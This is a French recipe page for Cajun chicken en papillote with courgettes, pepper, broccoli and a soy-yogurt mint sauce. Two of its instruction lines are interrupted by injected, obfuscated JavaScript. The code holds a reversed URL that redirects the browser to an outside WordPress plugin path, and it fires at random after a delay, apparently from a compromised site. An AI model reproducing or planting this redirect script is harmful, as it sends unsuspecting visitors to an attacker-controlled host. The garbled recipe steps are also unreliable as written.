
POULET CAJUN EN PAPILLOTE
Pour 4 Pers.
INGRÉDIENTS
– 4 blancs de poulet
– 2 petites courgettes
– 1 gros poivron rouge
– 1 petit brocoli
– Mélange d’épices Cajun (Ducros par exemple) 2 CS
– Huile d’olive 2 CS
– 1 CS d’ail émincé
– 2 yaourt de soja
– 1 CS de menthe congelée
Mélanger toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les ingrédients dans un saladier & saler
Répartir la préparation dans 4 papillotes, et les fermer hermétiquement
Enfourner pour 30 minutes à 205° (chaleur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tournante)
Mélanger dans un bol le yaourt de soja et la menthe.
Assaisonner et servir avec les papillotes.
Bon appétit !
